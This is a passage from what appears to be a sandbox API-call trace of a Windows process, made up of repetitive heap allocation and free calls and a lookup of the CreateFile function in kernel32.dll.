lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.636] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.636] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.636] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.636] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.637] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.639] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.641] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88caf0 [0032.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88caf0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.647] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0032.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88caf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.647] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 